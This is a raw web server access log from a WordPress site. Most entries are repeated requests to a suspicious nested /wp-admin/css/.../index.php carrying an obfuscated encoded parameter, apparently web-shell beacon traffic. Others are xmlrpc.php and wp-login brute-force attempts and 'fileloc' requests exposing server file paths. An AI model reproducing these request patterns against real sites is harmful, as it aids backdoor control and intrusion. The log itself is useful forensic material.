142.4.205.1 - - [16/Oct/2025:11:33:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323432342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383832342q3334316462313036653164333964356430323530663432626330626139626137222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:34:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323434342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383834342q6564373838373332323431356535323334386164643166653365386261363866222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:34:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323436342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383836342q6266636238393366303834383330386665336464363835343430386536623263222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:34:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323438342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383838342q6164623064653065643861356631363533343665376330373563396363326231222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
92.63.193.217 - - [16/Oct/2025:11:35:47 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
142.4.205.1 - - [16/Oct/2025:11:35:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323530342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383930342q3665616135313163393162333661613435393134313031343134313661653365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
91.134.16.45 - - [16/Oct/2025:11:36:04 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)"
91.134.16.45 - - [16/Oct/2025:11:36:06 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)"
91.134.16.45 - - [16/Oct/2025:11:36:09 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)"
91.134.16.45 - - [16/Oct/2025:11:36:10 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)"
91.134.16.45 - - [16/Oct/2025:11:36:11 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)"
91.134.16.45 - - [16/Oct/2025:11:36:13 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)"
142.4.205.1 - - [16/Oct/2025:11:35:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323532342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383932342q6434333737316230373838623962646166306161623833316433376534326261222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:35:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323534342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383934342q3134356638666464373133616664613039663766316661663330316264393463222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:36:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323536342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383936342q6565326132383632663138633766313939353138613865616466316631353838222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:36:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323538342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383938342q6534346138623366353033326663376533636539623661663835613233646530222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:36:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323630342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393030342q3861346539316339616362303866613661366236306166396538383262346132222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:37:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323632342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393032342q3061373130636331626264666264626466653832366337633663326237643561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:37:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323634342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393034342q3961356366623236613630386632323637336561353036366534333631316665222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:37:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323636342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393036342q6461643963643763326462373931386635303733313833363132643131663533222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:38:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323638342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393038342q3433323966646133656437613263343238346230643834376164306133336230222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
95.216.210.205 - - [16/Oct/2025:11:39:13 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (X11; CrOS x86_64 10452.85.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36"
95.216.210.205 - - [16/Oct/2025:11:39:13 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (X11; CrOS x86_64 10452.85.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36"
66.249.65.197 - - [16/Oct/2025:11:39:14 -0400] "GET /?_g=2405524 HTTP/1.0" 200 24370 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:38:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323730342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393130342q3830646661623039373738353839373134373839346664316135623364323130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:38:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323732342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393132342q6332646165633633363333313163376363323739623939323765623639333462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:39:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323734342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393134342q3263663661376433656362616163376365613133643230376132323963633561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:39:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323736342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393136342q6436313234323132393364303461643764343665353030313034313335353631222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:11:40:30 -0400] "GET /?_g=160316 HTTP/1.0" 200 25595 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:39:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323738342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393138342q3830353539356135346263373238646139386566653137636638343164343433222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:40:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323830342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393230342q3231666230386164646433386636623663393564333036383261336436656134222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
50.21.186.206 - - [16/Oct/2025:11:41:04 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
50.21.186.206 - - [16/Oct/2025:11:41:05 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
50.21.186.206 - - [16/Oct/2025:11:41:06 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
50.21.186.206 - - [16/Oct/2025:11:41:07 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
50.21.186.206 - - [16/Oct/2025:11:41:09 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
50.21.186.206 - - [16/Oct/2025:11:41:12 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5"
66.249.65.196 - - [16/Oct/2025:11:41:21 -0400] "GET /?_g=1321777 HTTP/1.0" 200 24274 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:40:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323832342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393232342q3635306438383361316239336635656365313562396665306232643966353866222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:40:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323834342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393234342q3839303331353866383739643735373734373134326631633362613934393036222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:41:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323836342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393236342q3035653435646166376538303039376461646562336438333865386431323363222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.68 - - [16/Oct/2025:11:42:20 -0400] "GET /market/2274538193.htm?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 18717 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.196 - - [16/Oct/2025:11:42:21 -0400] "GET /zhHant/product/surugaya/A2783991463?campaign_uid=f64d716db5e979ed2f947dbaf4296895b951ae7f HTTP/1.0" 200 24396 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:41:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323838342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393238342q3863356561336361303135333932353366313661653261653730326536396166222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:41:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323930342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393330342q3063613239633165653162663564313735386638616236373036616564633966222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:11:42:55 -0400] "GET /?_g=2181637 HTTP/1.0" 200 27809 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.196 - - [16/Oct/2025:11:42:56 -0400] "GET /?_g=2268148 HTTP/1.0" 200 25013 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:42:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323932342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393332342q3833663539366361396137653661366462383437353732653365616565633239222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:42:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323934392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393334392q6135316433643231663565373765343930653735353639316337653264613732222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:43:40 -0400] "GET /robots.txt HTTP/1.0" 200 4616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:43:42 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/internal_server_error.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7211 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:43:45 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/precondition_failed.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7143 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:43:47 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/request-uri_too_long.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7101 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:42:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323936392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393336392q3138653465363164666162373565373762333433623530373563316665653834222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:43:49 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/server.svg&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 8522 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:43:52 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/styles.css&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7498 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.65.196 - - [16/Oct/2025:11:43:57 -0400] "GET /market/48564731.htm HTTP/1.0" 200 24511 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.26 - - [16/Oct/2025:11:44:00 -0400] "GET /market/2274553085.htm?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wordfence-waf.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 21243 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
65.108.2.171 - - [16/Oct/2025:11:44:02 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/unauthorized.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7178 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.65.195 - - [16/Oct/2025:11:44:02 -0400] "GET /market/tall_portrait HTTP/1.0" 200 24049 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.108.2.171 - - [16/Oct/2025:11:44:04 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/unsupported_media_type.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7114 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:06 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6676 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
